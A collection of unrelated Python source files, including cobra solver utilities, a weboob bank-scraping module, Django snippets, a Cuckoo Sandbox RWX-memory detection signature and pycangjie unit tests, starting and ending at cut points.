    uuidAttr = "entryUUID"
    __index = None

    def __init__(self):
        # Load available backends
        for entry in pkg_resources.iter_entry_points("gosa.object.backend"):
            clazz = entry.load()
            ObjectBackendRegistry.backends[clazz.__name__] = clazz()

    def dn2uuid(self, backend, dn, from_db_only=False):
        uuid = ObjectBackendRegistry.backends[backend].dn2uuid(dn)
        if uuid is None and from_db_only is True:
            # fallback to db
            if self.__index is None:
                self.__index = PluginRegistry.getInstance("ObjectIndex")
            res = self.__index.search({'dn': dn}, {'uuid': 1})
            if len(res) == 1:
                uuid = res[0]['_uuid']
        return uuid

    def uuid2dn(self, backend, uuid, from_db_only=False):
        dn = ObjectBackendRegistry.backends[backend].uuid2dn(uuid)
        if dn is None and from_db_only is True:
            # fallback to db
            if self.__index is None:
                self.__index = PluginRegistry.getInstance("ObjectIndex")
            res = self.__index.search({'uuid': uuid}, {'dn': 1})
            if len(res) == 1:
                dn = res[0]['dn']
        return dn

    def get_timestamps(self, backend, dn):
        return ObjectBackendRegistry.backends[backend].get_timestamps(dn)

    @staticmethod
    def getInstance():
        if not ObjectBackendRegistry.instance:
            ObjectBackendRegistry.instance = ObjectBackendRegistry()

        return ObjectBackendRegistry.instance

    @staticmethod
    def getBackend(name):
        if not name in ObjectBackendRegistry.backends:
            raise ValueError(C.make_error("BACKEND_NOT_FOUND", name))

        return ObjectBackendRegistry.backends[name]

# -*- coding: utf-8 -*-

"""Additional helper functions for the optlang solvers.

All functions integrate well with the context manager, meaning that
all operations defined here are automatically reverted when used in a
`with model:` block.

The functions defined here together with the existing model functions should
allow you to implement custom flux analysis methods with ease.
"""

from __future__ import absolute_import

import re
from functools import partial
from collections import namedtuple
from types import ModuleType
from warnings import warn

import optlang
from optlang.symbolics import Basic, Zero

from cobra.exceptions import OptimizationError, OPTLANG_TO_EXCEPTIONS_DICT
from cobra.util.context import get_context


class SolverNotFound(Exception):
    """A simple Exception when a solver can not be found."""

    pass


# Define all the solvers that are found in optlang.
solvers = {match.split("_")[0]: getattr(optlang, match)
           for match in dir(optlang) if "_interface" in match}

# Defines all the QP solvers implemented in optlang.
qp_solvers = ["cplex"]  # QP in gurobi not implemented yet


def linear_reaction_coefficients(model, reactions=None):
    """Coefficient for the reactions in a linear objective.

    Parameters
    ----------
    model : cobra model
        the model object that defined the objective
    reactions : list
        an optional list for the reactions to get the coefficients for. All
        reactions if left missing.

    Returns
    -------
    dict
        A dictionary where the key is the reaction object and the value is
        the corresponding coefficient. Empty dictionary if there are no
        linear terms in the objective.
    """
    linear_coefficients = {}
    reactions = model.reactions if not reactions else reactions
    try:
        objective_expression = model.solver.objective.expression
        coefficients = objective_expression.as_coefficients_dict()
    except AttributeError:
        return linear_coefficients
    for rxn in reactions:
        forward_coefficient = coefficients.get(rxn.forward_variable, 0)
        reverse_coefficient = coefficients.get(rxn.reverse_variable, 0)
        if forward_coefficient != 0:
            if forward_coefficient == -reverse_coefficient:
                linear_coefficients[rxn] = float(forward_coefficient)
    return linear_coefficients


def _valid_atoms(model, expression):
    """Check whether a sympy expression references the correct variables.

    Parameters
    ----------
    model : cobra.Model
        The model in which to check for variables.
    expression : sympy.Basic
        A sympy expression.

    Returns
    -------
    boolean
        True if all referenced variables are contained in model, False
        otherwise.
    """
    atoms = expression.atoms(optlang.interface.Variable)
    return all(a.problem is model.solver for a in atoms)


def set_objective(model, value, additive=False):
    """Set the model objective.

    Parameters
    ----------
    model : cobra model
       The model to set the objective for
    value : model.problem.Objective,
            e.g. optlang.glpk_interface.Objective, sympy.Basic or dict

        If the model objective is linear, the value can be a new Objective
        object or a dictionary with linear coefficients where each key is a
        reaction and the element the new coefficient (float).

        If the objective is not linear and `additive` is true, only values
        of class Objective.

    additive : bool
        If true, add the terms to the current objective, otherwise start with
        an empty objective.
    """
    interface = model.problem
    reverse_value = model.solver.objective.expression
    reverse_value = interface.Objective(
        reverse_value, direction=model.solver.objective.direction,
        sloppy=True)

    if isinstance(value, dict):
        if not model.objective.is_Linear:
            raise ValueError('can only update non-linear objectives '
                             'additively using object of class '
                             'model.problem.Objective, not %s' %
                             type(value))

        if not additive:
            model.solver.objective = interface.Objective(
                Zero, direction=model.solver.objective.direction)
        for reaction, coef in value.items():
            model.solver.objective.set_linear_coefficients(
                {reaction.forward_variable: coef,
                 reaction.reverse_variable: -coef})

    elif isinstance(value, (Basic, optlang.interface.Objective)):
        if isinstance(value, Basic):
            value = interface.Objective(
                value, direction=model.solver.objective.direction,
                sloppy=False)
        # Check whether expression only uses variables from current model
        # clone the objective if not, faster than cloning without checking
        if not _valid_atoms(model, value.expression):
            value = interface.Objective.clone(value, model=model.solver)

        if not additive:
            model.solver.objective = value
        else:
            model.solver.objective += value.expression
    else:
        raise TypeError(
            '%r is not a valid objective for %r.' % (value, model.solver))

    context = get_context(model)
    if context:
        def reset():
            model.solver.objective = reverse_value
            model.solver.objective.direction = reverse_value.direction

        context(reset)


def interface_to_str(interface):
    """Give a string representation for an optlang interface.

    Parameters
    ----------
    interface : string, ModuleType
        Full name of the interface in optlang or cobra representation.
        For instance 'optlang.glpk_interface' or 'optlang-glpk'.

    Returns
    -------
    string
       The name of the interface as a string
    """
    if isinstance(interface, ModuleType):
        interface = interface.__name__
    return re.sub(r"optlang.|.interface", "", interface)


def get_solver_name(mip=False, qp=False):
    """Select a solver for a given optimization problem.

    Parameters
    ----------
    mip : bool
        Does the solver require mixed integer linear programming capabilities?
    qp : bool
        Does the solver require quadratic programming capabilities?

    Returns
    -------
    string
        The name of feasible solver.

    Raises
    ------
    SolverNotFound
        If no suitable solver could be found.
    """
    if len(solvers) == 0:
        raise SolverNotFound("no solvers installed")
    # Those lists need to be updated as optlang implements more solvers
    mip_order = ["gurobi", "cplex", "glpk"]
    lp_order = ["glpk", "cplex", "gurobi"]
    qp_order = ["cplex"]

    if mip is False and qp is False:
        for solver_name in lp_order:
            if solver_name in solvers:
                return solver_name
        # none of them are in the list order - so return the first one
        return list(solvers)[0]
    elif qp:  # mip does not yet matter for this determination
        for solver_name in qp_order:
            if solver_name in solvers:
                return solver_name
        raise SolverNotFound("no qp-capable solver found")
    else:
        for solver_name in mip_order:
            if solver_name in solvers:
                return solver_name
    raise SolverNotFound("no mip-capable solver found")


def choose_solver(model, solver=None, qp=False):
    """Choose a solver given a solver name and model.

    This will choose a solver compatible with the model and required
    capabilities. Also respects model.solver where it can.

    Parameters
    ----------
    model : a cobra model
        The model for which to choose the solver.
    solver : str, optional
        The name of the solver to be used. Optlang solvers should be prefixed
        by "optlang-", for instance "optlang-glpk".
    qp : boolean, optional
        Whether the solver needs Quadratic Programming capabilities.

    Returns
    -------
    legacy : boolean
        Whether the returned solver is a legacy (old cobra solvers) version or
        an optlang solver (legacy = False).
    solver : a cobra or optlang solver interface
        Returns a valid solver for the problem. May be a cobra solver or an
        optlang interface.

    Raises
    ------
    SolverNotFound
        If no suitable solver could be found.
    """
    legacy = False
    if solver is None:
        solver = model.problem
    elif "optlang-" in solver:
        solver = interface_to_str(solver)
        solver = solvers[solver]
    else:
        legacy = True
        solver = legacy_solvers.solver_dict[solver]

    # Check for QP, raise error if no QP solver found
    # optlang only since old interface interprets None differently
    if qp and interface_to_str(solver) not in qp_solvers:
        solver = solvers[get_solver_name(qp=True)]

    return legacy, solver


def add_cons_vars_to_problem(model, what, **kwargs):
    """Add variables and constraints to a Model's solver object.

    Useful for variables and constraints that can not be expressed with
    reactions and lower/upper bounds. Will integrate with the Model's context
    manager in order to revert changes upon leaving the context.

    Parameters
    ----------
    model : a cobra model
       The model to which to add the variables and constraints.
    what : list or tuple of optlang variables or constraints.
       The variables or constraints to add to the model. Must be of class
       `model.problem.Variable` or
       `model.problem.Constraint`.
    **kwargs : keyword arguments
        passed to solver.add()
    """
    context = get_context(model)

    model.solver.add(what, **kwargs)
    if context:
        context(partial(model.solver.remove, what))


def remove_cons_vars_from_problem(model, what):
    """Remove variables and constraints from a Model's solver object.

    Useful to temporarily remove variables and constraints from a Models's
    solver object.

    Parameters
    ----------
    model : a cobra model
       The model from which to remove the variables and constraints.
    what : list or tuple of optlang variables or constraints.
       The variables or constraints to remove from the model. Must be of
       class `model.problem.Variable` or
       `model.problem.Constraint`.
    """
    context = get_context(model)

    model.solver.remove(what)
    if context:
        context(partial(model.solver.add, what))


def add_absolute_expression(model, expression, name="abs_var", ub=None,
                            difference=0, add=True):
    """Add the absolute value of an expression to the model.

    Also defines a variable for the absolute value that can be used in other
    objectives or constraints.

    Parameters
    ----------
    model : a cobra model
       The model to which to add the absolute expression.
    expression : A sympy expression
       Must be a valid expression within the Model's solver object. The
       absolute value is applied automatically on the expression.
    name : string
       The name of the newly created variable.
    ub : positive float
       The upper bound for the variable.
    difference : positive float
        The difference between the expression and the variable.
    add : bool
        Whether to add the variable to the model at once.

    Returns
    -------
    namedtuple
        A named tuple with variable and two constraints (upper_constraint,
        lower_constraint) describing the new variable and the constraints
        that assign the absolute value of the expression to it.
    """
    Components = namedtuple('Components', ['variable', 'upper_constraint',
                                           'lower_constraint'])
    variable = model.problem.Variable(name, lb=0, ub=ub)
    # The following constraints enforce variable > expression and
    # variable > -expression
    upper_constraint = model.problem.Constraint(expression - variable,
                                                ub=difference,
                                                name="abs_pos_" + name),
    lower_constraint = model.problem.Constraint(expression + variable,
                                                lb=difference,
                                                name="abs_neg_" + name)
    to_add = Components(variable, upper_constraint, lower_constraint)
    if add:
        add_cons_vars_to_problem(model, to_add)
    return to_add


def fix_objective_as_constraint(model, fraction=1, bound=None,
                                name='fixed_objective_{}'):
    """Fix current objective as an additional constraint.

    When adding constraints to a model, such as done in pFBA which
    minimizes total flux, these constraints can become too powerful,
    resulting in solutions that satisfy optimality but sacrifices too
    much for the original objective function. To avoid that, we can fix
    the current objective value as a constraint to ignore solutions that
    give a lower (or higher depending on the optimization direction)
    objective value than the original model.

    When done with the model as a context, the modification to the
    objective will be reverted when exiting that context.

    Parameters
    ----------
    model : cobra.Model
        The model to operate on
    fraction : float
        The fraction of the optimum the objective is allowed to reach.
    bound : float, None
        The bound to use instead of fraction of maximum optimal value. If
        not None, fraction is ignored.
    name : str
        Name of the objective. May contain one `{}` placeholder which is filled
        with the name of the old objective.
    """
    fix_objective_name = name.format(model.objective.name)
    if fix_objective_name in model.constraints:
        model.solver.remove(fix_objective_name)
    if bound is None:
        bound = model.slim_optimize(error_value=None) * fraction
    if model.objective.direction == 'max':
        ub, lb = None, bound
    else:
        ub, lb = bound, None
    constraint = model.problem.Constraint(
        model.objective.expression,
        name=fix_objective_name, ub=ub, lb=lb)
    add_cons_vars_to_problem(model, constraint, sloppy=True)


def check_solver_status(status, raise_error=False):
    """Perform standard checks on a solver's status."""
    if status == optlang.interface.OPTIMAL:
        return
    elif status == optlang.interface.INFEASIBLE and not raise_error:
        warn("solver status is '{}'".format(status), UserWarning)
    elif status is None:
        raise RuntimeError(
            "model was not optimized yet or solver context switched")
    else:
        raise OptimizationError("solver status is '{}'".format(status))


def assert_optimal(model, message='optimization failed'):
    """Assert model solver status is optimal.

    Do nothing if model solver status is optimal, otherwise throw
    appropriate exception depending on the status.

    Parameters
    ----------
    model : cobra.Model
        The model to check the solver status for.
    message : str (optional)
        Message to for the exception if solver status was not optimal.
    """
    if model.solver.status != optlang.interface.OPTIMAL:
        raise OPTLANG_TO_EXCEPTIONS_DICT[model.solver.status](message)


import cobra.solvers as legacy_solvers  # noqa

from __future__ import absolute_import
import json

class JSONRenderer:
    """
    Renders a mystery as JSON
    """

    def render(self, mystery):
        return json.dumps(mystery.encode(), indent=4)

"""General-use classes to interact with the ApplicationAutoScaling service through CloudFormation.

See Also:
    `AWS developer guide for ApplicationAutoScaling
    <https://docs.aws.amazon.com/autoscaling/application/APIReference/Welcome.html>`_
"""

# noinspection PyUnresolvedReferences
from .._raw import applicationautoscaling as _raw

# noinspection PyUnresolvedReferences
from .._raw.applicationautoscaling import *

#!/usr/bin/env python

import sys, argparse

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--input', type=str, action='store', dest='input', default=None, help="Input file")
    args = parser.parse_args()
    stats = dict()
    if args.input is None:
        print "Error: No input file"
    with open(args.input) as in_file:
        for line in in_file.readlines():
            time = int(line.split()[0])
            tx_bytes = int(line.split()[1])
            stats[time] = tx_bytes
    stats = sorted(stats.items())
    start_time = stats[0][0]
    prev_tx = stats[0][1]
    no_traffic_flag = True
    for time, tx_bytes in stats:
        if no_traffic_flag:
            if tx_bytes > (prev_tx+100000):
                no_traffic_flag = False
                start_time, prev_tx = time, tx_bytes
        else:
            print (time-start_time), (tx_bytes-prev_tx)
            prev_tx = tx_bytes


if __name__ == "__main__":
    main()            

# -*- coding: utf-8 -*-
"""digitalocean API to manage droplets"""

__version__ = "1.16.0"
__author__ = "Lorenzo Setale ( http://who.is.lorenzo.setale.me/? )"
__author_email__ = "lorenzo@setale.me"
__license__ = "LGPL v3"
__copyright__ = "Copyright (c) 2012-2020 Lorenzo Setale"

from .Manager import Manager
from .Droplet import Droplet, DropletError, BadKernelObject, BadSSHKeyFormat
from .Region import Region
from .Size import Size
from .Image import Image
from .Action import Action
from .Account import Account
from .Balance import Balance
from .Domain import Domain
from .Record import Record
from .SSHKey import SSHKey
from .Kernel import Kernel
from .FloatingIP import FloatingIP
from .Volume import Volume
from .baseapi import Error, EndPointError, TokenError, DataReadError, NotFoundError
from .Tag import Tag
from .LoadBalancer import LoadBalancer
from .LoadBalancer import StickySessions, ForwardingRule, HealthCheck
from .Certificate import Certificate
from .Snapshot import Snapshot
from .Project import Project
from .Firewall import Firewall, InboundRule, OutboundRule, Destinations, Sources
from .VPC import VPC

 # Copyright (c) 2010 by Yaco Sistemas <pmartin@yaco.es>
 #
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
 # (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 # GNU Lesser General Public License for more details.
 #
 # You should have received a copy of the GNU Lesser General Public License
 # along with this programe.  If not, see <http://www.gnu.org/licenses/>.

from django.conf.urls.defaults import patterns, url

urlpatterns = patterns('autoreports.views',
    url(r'^ajax/fields/tree/$', 'reports_ajax_fields', name='reports_ajax_fields'),
    url(r'^ajax/fields/options/$', 'reports_ajax_fields_options', name='reports_ajax_fields_options'),


    url(r'^(category/(?P<category_key>[\w-]+)/)?$', 'reports_list', name='reports_list'),
    url(r'^(?P<registry_key>[\w-]+)/$', 'reports_api', name='reports_api'),
    url(r'^(?P<registry_key>[\w-]+)/(?P<report_id>\d+)/$', 'reports_api', name='reports_api'),
    url(r'^(?P<registry_key>[\w-]+)/reports/$', 'reports_api_list', name='reports_api_list'),
    url(r'^(?P<registry_key>[\w-]+)/wizard/$', 'reports_api_wizard', name='reports_api_wizard'),
    url(r'^(?P<registry_key>[\w-]+)/wizard/(?P<report_id>\d+)/$', 'reports_api_wizard', name='reports_api_wizard'),
    url(r'^(?P<app_name>[\w-]+)/(?P<model_name>[\w-]+)/$', 'reports_view', name='reports_view'),
    )

# encoding: utf-8
from __future__ import absolute_import, unicode_literals

from apiview.model import AbstractUserMixin, BaseModel
from django.contrib.auth.base_user import AbstractBaseUser
from django.db import models


class User(AbstractUserMixin, BaseModel, AbstractBaseUser):
    is_staff = False

    def get_short_name(self):
        return self.name

    def get_full_name(self):
        return self.nickname

    USERNAME_FIELD = 'username'
    username = models.CharField('用户名', unique=True, max_length=64, editable=False, null=False, blank=False)
    password = models.CharField('密码', max_length=128, unique=True, editable=False, null=False, blank=True)
    nickname = models.CharField('昵称', unique=True, max_length=64, editable=False, null=False, blank=False)

    class Meta:
        db_table = 'example_user'
        app_label = 'example_app'
        verbose_name = verbose_name_plural = "用户"

# -*- coding: utf-8 -*-

# Copyright(C) 2014      smurail
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.

from __future__ import unicode_literals

import re

from weboob.exceptions import BrowserIncorrectPassword
from weboob.browser.pages import HTMLPage, JsonPage, pagination, LoggedPage
from weboob.browser.elements import ListElement, ItemElement, TableElement, method
from weboob.browser.filters.standard import CleanText, CleanDecimal, DateGuesser, Env, Field, Filter, Regexp, Currency, Date
from weboob.browser.filters.html import Link, Attr, TableCell
from weboob.capabilities.bank import Account, Investment
from weboob.capabilities.base import NotAvailable
from weboob.tools.capabilities.bank.transactions import FrenchTransaction
from weboob.tools.compat import urljoin
from weboob.tools.capabilities.bank.investments import is_isin_valid


__all__ = ['LoginPage']


class UselessPage(HTMLPage):
    pass


class PasswordCreationPage(HTMLPage):
    def get_message(self):
        xpath = '//div[@class="bienvenueMdp"]/following-sibling::div'
        return '%s%s' % (CleanText(xpath + '/strong')(self.doc), CleanText(xpath, children=False)(self.doc))


class ErrorPage(HTMLPage):
    pass


class SubscriptionPage(LoggedPage, JsonPage):
    pass


class LoginPage(HTMLPage):
    pass


class CMSOPage(HTMLPage):
    @property
    def logged(self):
        if len(self.doc.xpath('//b[text()="Session interrompue"]')) > 0:
            return False
        return True


class AccountsPage(CMSOPage):
    TYPES = {'COMPTE CHEQUES':               Account.TYPE_CHECKING,
             'COMPTE TITRES':                Account.TYPE_MARKET,
             "ACTIV'EPARGNE":                Account.TYPE_SAVINGS,
             "TRESO'VIV":                    Account.TYPE_SAVINGS,
            }

    @method
    class iter_accounts(ListElement):
        item_xpath = '//div[has-class("groupe-comptes")]//li'

        class item(ItemElement):
            klass = Account

            class Type(Filter):
                def filter(self, label):
                    for pattern, actype in AccountsPage.TYPES.items():
                        if label.startswith(pattern):
                            return actype
                    return Account.TYPE_UNKNOWN

            obj__history_url = Link('.//a[1]')
            obj_id = CleanText('.//span[has-class("numero-compte")]') & Regexp(pattern=r'(\d{3,}[\w]+)', default='')
            obj_label = CleanText('.//span[has-class("libelle")][1]')
            obj_currency = Currency('//span[has-class("montant")]')
            obj_balance = CleanDecimal('.//span[has-class("montant")]', replace_dots=True)
            obj_type = Type(Field('label'))
            # Last numbers replaced with XX... or we have to send sms to get RIB.
            obj_iban = NotAvailable

            # some accounts may appear on multiple areas, but the area where they come from is indicated
            obj__owner = CleanText('(./preceding-sibling::tr[@class="LnMnTiers"])[last()]')

            def validate(self, obj):
                if obj.id is None:
                    obj.id = obj.label.replace(' ', '')
                return True

    def on_load(self):
        if self.doc.xpath('//p[contains(text(), "incident technique")]'):
            raise BrowserIncorrectPassword("Vous n'avez aucun compte sur cet espace. " \
                                           "Veuillez choisir un autre type de compte.")


class InvestmentPage(CMSOPage):
    def has_error(self):
        return CleanText('//span[@id="id_error_msg"]')(self.doc)

    @method
    class iter_accounts(ListElement):
        item_xpath = '//table[@class="Tb" and tr[1][@class="LnTit"]]/tr[@class="LnA" or @class="LnB"]'

        class item(ItemElement):
            klass = Account

            def obj_id(self):
                area_id = Regexp(CleanText('(./preceding-sibling::tr[@class="LnMnTiers"][1])//span[@class="CelMnTiersT1"]'),
                            r'\((\d+)\)', default='')(self)
                acc_id = Regexp(CleanText('./td[1]'), r'(\d+)\s*(\d+)', r'\1\2')(self)
                if area_id:
                    return '%s.%s' % (area_id, acc_id)
                return acc_id

            def obj__formdata(self):
                js = Attr('./td/a[1]', 'onclick', default=None)(self)
                if js is None:
                    return
                args = re.search(r'\((.*)\)', js).group(1).split(',')

                form = args[0].strip().split('.')[1]
                idx = args[2].strip()
                idroot = args[4].strip().replace("'", "")
                return (form, idx, idroot)

            obj_url = Link('./td/a[1]', default=None)

    def go_account(self, form, idx, idroot):
        form = self.get_form(name=form)
        form['indiceCompte'] = idx
        form['idRacine'] = idroot
        form.submit()


class CmsoTableElement(TableElement):
    head_xpath = '//table[has-class("Tb")]/tr[has-class("LnTit")]/td'
    item_xpath = '//table[has-class("Tb")]/tr[has-class("LnA") or has-class("LnB")]'


class InvestmentAccountPage(CMSOPage):
    @method
    class iter_investments(CmsoTableElement):
        col_label = 'Valeur'
        col_code = 'Code'
        col_quantity = 'Qté'
        col_unitvalue = 'Cours'
        col_valuation = 'Valorisation'
        col_vdate = 'Date cours'

        class item(ItemElement):
            klass = Investment

            obj_label = CleanText(TableCell('label'))
            obj_quantity = CleanDecimal(TableCell('quantity'), replace_dots=True)
            obj_unitvalue = CleanDecimal(TableCell('unitvalue'), replace_dots=True)
            obj_valuation = CleanDecimal(TableCell('valuation'), replace_dots=True)
            obj_vdate = Date(CleanText(TableCell('vdate')), dayfirst=True, default=NotAvailable)

            def obj_code(self):
                if Field('label')(self) == "LIQUIDITES":
                    return 'XX-liquidity'
                code = CleanText(TableCell('code'))(self)
                return code if is_isin_valid(code) else NotAvailable

            def obj_code_type(self):
                return Investment.CODE_TYPE_ISIN if is_isin_valid(Field('code')(self)) else NotAvailable


class Transaction(FrenchTransaction):
    PATTERNS = [(re.compile(r'^RET DAB (?P<dd>\d{2})/?(?P<mm>\d{2})(/?(?P<yy>\d{2}))? (?P<text>.*)'),
                                                              FrenchTransaction.TYPE_WITHDRAWAL),
                (re.compile(r'CARTE (?P<dd>\d{2})/(?P<mm>\d{2}) (?P<text>.*)'),
                                                              FrenchTransaction.TYPE_CARD),
                (re.compile(r'^(?P<category>VIR(EMEN)?T? (SEPA)?(RECU|FAVEUR)?)( /FRM)?(?P<text>.*)'),
                                                              FrenchTransaction.TYPE_TRANSFER),
                (re.compile(r'^PRLV (?P<text>.*)( \d+)?$'),    FrenchTransaction.TYPE_ORDER),
                (re.compile(r'^(CHQ|CHEQUE) .*$'),             FrenchTransaction.TYPE_CHECK),
                (re.compile(r'^(AGIOS /|FRAIS) (?P<text>.*)'), FrenchTransaction.TYPE_BANK),
                (re.compile(r'^(CONVENTION \d+ |F )?COTIS(ATION)? (?P<text>.*)'),
                                                              FrenchTransaction.TYPE_BANK),
                (re.compile(r'^REMISE (?P<text>.*)'),          FrenchTransaction.TYPE_DEPOSIT),
                (re.compile(r'^(?P<text>.*)( \d+)? QUITTANCE .*'),
                                                              FrenchTransaction.TYPE_ORDER),
                (re.compile(r'^.* LE (?P<dd>\d{2})/(?P<mm>\d{2})/(?P<yy>\d{2})$'),
                                                              FrenchTransaction.TYPE_UNKNOWN),
                (re.compile(r'^.* PAIEMENT (?P<dd>\d{2})/(?P<mm>\d{2}) (?P<text>.*)'),
                                                              FrenchTransaction.TYPE_UNKNOWN),
               ]


class CmsoTransactionElement(ItemElement):
    klass = Transaction

    def condition(self):
        return len(self.el) >= 5 and not self.el.get('id', '').startswith('libelleLong')


class HistoryPage(CMSOPage):
    def get_date_range_list(self):
        return [d for d in self.doc.xpath('//select[@name="date"]/option/@value') if d]

    @pagination
    @method
    class iter_history(ListElement):
        item_xpath = '//div[contains(@class, "master-table")]//ul/li'

        def next_page(self):
            pager = self.page.doc.xpath('//div[@class="pager"]')
            if pager:  # more than one page if only enough transactions
                assert len(pager) == 1

                next_links = pager[0].xpath('./span/following-sibling::a[@class="page"]')
                if next_links:
                    url_next_page = Link('.')(next_links[0])
                    url_next_page = urljoin(self.page.url, url_next_page)
                    return self.page.browser.build_request(url_next_page)

        class item(CmsoTransactionElement):

            def date(selector):
                return DateGuesser(Regexp(CleanText(selector), r'\w+ (\d{2}/\d{2})'), Env('date_guesser')) | Transaction.Date(selector)

            # CAUTION: this website write a 'Date valeur' inside a div with a class == 'c-ope'
            # and a 'Date opération' inside a div with a class == 'c-val'
            # so actually i assume 'c-val' class is the real operation date and 'c-ope' is value date
            obj_date = date('./div[contains(@class, "c-val")]')
            obj_vdate = date('./div[contains(@class, "c-ope")]')
            obj_raw = Transaction.Raw(Regexp(CleanText('./div[contains(@class, "c-libelle-long")]'), r'Libellé étendu (.+)'))
            obj_amount = Transaction.Amount('./div[contains(@class, "c-credit")]', './div[contains(@class, "c-debit")]')


class UpdateTokenMixin(object):
    def on_load(self):
        if 'Authentication' in self.response.headers:
            self.browser.token = self.response.headers['Authentication'].split(' ')[-1]


class SSODomiPage(JsonPage, UpdateTokenMixin):
    def get_sso_url(self):
        return self.doc['urlSSO']


class AuthCheckUser(HTMLPage):
    pass


# Copyright (C) 2014 Optiv, Inc. (brad.spengler@optiv.com)
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.

from lib.cuckoo.common.abstracts import Signature

class InjectionRWX(Signature):
    name = "injection_rwx"
    description = "Creates RWX memory"
    severity = 2
    confidence = 50
    categories = ["injection"]
    authors = ["Optiv"]
    minimum = "1.2"
    evented = True

    def __init__(self, *args, **kwargs):
        Signature.__init__(self, *args, **kwargs)

    filter_apinames = set(["NtAllocateVirtualMemory","NtProtectVirtualMemory","VirtualProtectEx"])
    filter_analysistypes = set(["file"])

    def on_call(self, call, process):
        if call["api"] == "NtAllocateVirtualMemory" or call["api"] == "VirtualProtectEx":
            protection = self.get_argument(call, "Protection")
            # PAGE_EXECUTE_READWRITE
            if protection == "0x00000040":
                return True
        elif call["api"] == "NtProtectVirtualMemory":
            protection = self.get_argument(call, "NewAccessProtection")
            # PAGE_EXECUTE_READWRITE
            if protection == "0x00000040":
                return True

# Copyright (c) 2013 - The pycangjie authors
#
# This file is part of pycangjie, the Python bindings to libcangjie.
#
# pycangjie is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pycangjie is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pycangjie.  If not, see <http://www.gnu.org/licenses/>.


import itertools
import operator
import string
import subprocess
import unittest

import cangjie


class MetaTest(type):
    """Metaclass for our test cases

    The goal is to provide every TestCase class with methods like test_a(),
    test_b(), etc..., in other words, one method per potential Cangjie input
    code.

    Well, not quite, because that would be 12356630 methods (the number of
    strings composed of 1 to 5 lowercase ascii letters), and even though my
    laptop has 8Go of RAM, the test process gets killed by the OOM killer. :)

    So we cheat, and use libcangjie's wildcard support, so that we only
    generate 26 + 26^2 = 702 methods.
    """
    def __init__(cls, name, bases, dct):
        super(MetaTest, cls).__init__(name, bases, dct)

        def gen_codes():
            """Generate the 702 possible input codes"""
            # First, the 1-character codes
            for c in string.ascii_lowercase:
                yield c

            # Next, the 2-characters-with-wildcard codes
            for t in itertools.product(string.ascii_lowercase, repeat=2):
                yield '*'.join(t)

        def tester(code):
            def func(cls):
                return cls.run_test(code)
            return func

        # Generate the test_* methods
        for code in gen_codes():
            setattr(cls, "test_%s" % code.replace("*", ""), tester(code))


class BaseTestCase(unittest.TestCase):
    """Base test class, grouping the common stuff for all our unit tests"""
    def __init__(self, name):
        super().__init__(name)

        self.cli_cmd = ["/usr/bin/libcangjie_cli"] + self.cli_options

        self.language = (cangjie.filters.BIG5 | cangjie.filters.HKSCS |
                         cangjie.filters.PUNCTUATION |
                         cangjie.filters.CHINESE |
                         cangjie.filters.ZHUYIN | cangjie.filters.KANJI |
                         cangjie.filters.KATAKANA |
                         cangjie.filters.HIRAGANA |
                         cangjie.filters.SYMBOLS)

    def setUp(self):
        self.cj = cangjie.Cangjie(self.version, self.language)

    def tearDown(self):
        del self.cj

    def run_command(self, cmd):
        """Run a command, deal with errors, and return its stdout"""
        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        out, err = proc.communicate()

        try:
            cangjie.errors.handle_error_code(proc.returncode,
                                             msg="Unknown error while running"
                                                 " libcangjie_cli (%d)"
                                                 % proc.returncode)

        except cangjie.errors.CangjieNoCharsError:
            return ""

        try:
            return out.decode("utf-8")

        except UnicodeDecodeError:
            # Python's 'utf-8' codec trips over b"\xed\xa1\x9d\xed\xbc\xb2",
            # but according to [1] and [2], it is a valid sequence of 2 chars:
            #     U+D85D    \xed\xa1\x9d
            #     U+DF32    \xed\xbc\xb2
            # [1] http://www.utf8-chartable.de/unicode-utf8-table.pl?start=55389&utf8=string-literal
            # [2] http://www.utf8-chartable.de/unicode-utf8-table.pl?start=57138&utf8=string-literal
            # TODO: Investigate this further, and eventually open a bug report
            out2 = []
            for line in out.split("\n".encode("utf-8")):
                try:
                    out2.append(line.decode("utf-8"))
                except UnicodeDecodeError:
                    pass
            return "\n".join(out2)

    def run_test(self, input_code):
        """Run the actual test

        This compares the output of the libcangjie_cli tool with the output
        from pycangjie.

        The idea is that if pycangjie produces the same results as a C++ tool
        compiled against libcangjie, then pycangjie properly wraps libcangjie.

        We do not try to verify that pycangjie produces valid results here,
        validity is to be checked in libcangjie.

        Note that this whole test is based on scraping the output of
        libcangjie_cli, which is quite fragile.
        """
        # Get a list of CangjieChar from libcangjie_cli as a reference
        tmp_expected = self.run_command(self.cli_cmd+[input_code]).split("\n")
        tmp_expected = map(lambda x: x.strip(" \n"), tmp_expected)
        tmp_expected = filter(lambda x: len(x) > 0, tmp_expected)

        expected = []
        for item in tmp_expected:
            chchar, simpchar, code, frequency = item.split(", ")

            chchar = chchar.split(": ")[-1].strip("'")
            simpchar = simpchar.split(": ")[-1].strip("'")
            code = code.split(": ")[-1].strip("'")
            frequency = int(frequency.split(" ")[-1])

            expected.append(cangjie._core.CangjieChar(chchar.encode("utf-8"),
